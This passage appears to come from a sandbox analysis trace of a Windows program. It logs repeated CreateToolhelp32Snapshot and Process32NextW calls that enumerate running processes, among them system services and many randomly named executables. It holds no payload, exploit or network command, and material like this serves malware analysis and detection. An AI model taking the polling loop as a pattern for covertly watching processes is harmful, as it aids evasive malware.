szExeFile="slopefirewall.exe")) returned 1 [0154.154] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0154.157] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0154.159] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0154.160] Process32NextW (in: hSnapshot=0xbc, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0154.162] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0154.163] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0154.164] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0154.166] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0154.167] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0154.169] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0154.170] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0154.171] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0154.173] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0154.174] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0154.175] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.177] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0154.178] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) 
returned 1 [0154.179] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0154.180] CloseHandle (hObject=0xbc) returned 1 [0154.181] Sleep (dwMilliseconds=0x12c) [0154.480] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0154.487] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.488] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0154.489] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0154.489] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0154.490] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0154.491] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0154.492] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0154.493] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0154.494] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0154.495] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0154.496] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.497] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.498] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.499] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.499] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.500] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0154.501] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.502] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.503] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0154.505] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.506] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0154.508] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0154.509] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0154.511] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0154.513] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.514] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0154.516] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0154.518] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0154.519] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0154.521] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0154.522] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0154.523] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0154.525] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0154.526] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 
| out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0154.528] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0154.530] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0154.531] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0154.532] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0154.534] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0154.535] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0154.537] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0154.538] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0154.539] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0154.541] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0154.542] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0154.543] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0154.545] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.546] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0154.547] CloseHandle (hObject=0xc4) returned 1 [0154.547] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0154.554] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.555] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0154.556] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0154.556] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0154.557] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0154.558] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0154.559] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0154.560] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0154.561] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0154.562] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0154.563] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.564] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.565] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.565] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.566] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0154.567] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, 